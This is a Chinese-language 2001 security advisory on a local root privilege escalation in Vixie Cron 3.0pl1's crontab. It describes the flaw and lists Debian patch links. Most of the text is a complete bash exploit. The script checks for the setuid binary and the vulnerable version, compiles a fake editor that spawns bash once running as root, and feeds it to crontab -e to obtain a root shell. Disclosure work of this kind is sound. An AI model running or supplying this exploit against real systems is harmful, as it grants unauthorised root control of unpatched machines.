部分Vixie Cron crontab 版本存在权限提升问题发布时间:2001-05-09 更新时间:2001-05-09 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 Paul Vixie Vixie Cron 3.0pl1详细描述 Vixie cron是一个流行的定时执行命令的程序,在修改操作后当解析错误发生时,crontab不会丢弃ROOT权利直接来修改后继 的修改操作,这样攻击者可以编辑他们的crontab文件并输入一行来导致解析失败,这样就可以在editor中执行任意命令或者覆盖任意文件。 测试代码 #!/bin/bash clear echo ".-----------------------------------------------------------." echo "| Marchew.Hyperreal presents: vixie crontab exploit #728371 |" echo "|===========================================================|" echo "| Sebastian Krahmer <krahmer@security.is> |" echo "| Michal Zalewski <lcamtuf@coredump.cx> |" echo "\`-----------------------------------------------------------'" echo test "$CRONBIN" = "" && CRONBIN=/usr/bin/crontab echo ">>> Using binary: $CRONBIN" echo -n ">>> Setuid check: " if [ -u $CRONBIN ]; then echo "PASSED" else echo "FAILED" echo exit 1 fi echo -n ">>> Version check: " QQ=`strings $CRONBIN | grep '43 vixie Exp'` if [ "$QQ" = "" ]; then echo "FAILED" echo exit 1 else echo "PASSED" fi echo ">>> Building exploit..." cat >edit0r.c <<_eof_ #include <stdio.h> int main(int argc,char* argv[]) { sleep(1); if (geteuid()) { FILE* x=fopen(argv[1],"w"); fprintf(x,"blah blah blah\n"); fclose(x); } else { dup2(1,0); dup2(1,2); printf("\n>>> Entering rootshell, babe...\n"); system("touch $HOME/.xploited"); system("bash"); } } _eof_ gcc edit0r.c -o edit0r &>/dev/null rm -f edit0r.c if [ ! -f edit0r ]; then echo ">>> Cannot compile exploit." echo exit 1 fi rm -f ~/.xploited echo ">>> Performing attack..." ( echo "y"; echo "n" ) | VISUAL=$PWD/edit0r $CRONBIN -e 2>/dev/null rm -f edit0r if [ -f ~/.xploited ]; then echo echo ">>> Thank you." rm -f ~/.xploited echo exit 0 else echo echo ">>> Apparently I am not able to exploit it, sorry..." echo exit 1 fi 解决方案 升级程序: Paul Vixie Vixie Cron 3.0pl1: Debian upgrade 2.2 alpha cron_3.0pl1-57.3_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/cro n_3.0pl1-57.3_alpha.deb Debian upgrade 2.2 arm cron_3.0pl1-57.3_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/cron_ 3.0pl1-57.3_arm.deb Debian upgrade 2.2 i386 cron_3.0pl1-57.3_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/cron _3.0pl1-57.3_i386.deb Debian upgrade 2.2 m68k cron_3.0pl1-57.3_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/cron _3.0pl1-57.3_m68k.deb Debian upgrade 2.2 ppc cron_3.0pl1-57.3_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/c ron_3.0pl1-57.3_powerpc.deb Debian upgrade 2.2 sparc cron_3.0pl1-57.3_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/cro n_3.0pl1-57.3_sparc.deb 相关信息 |
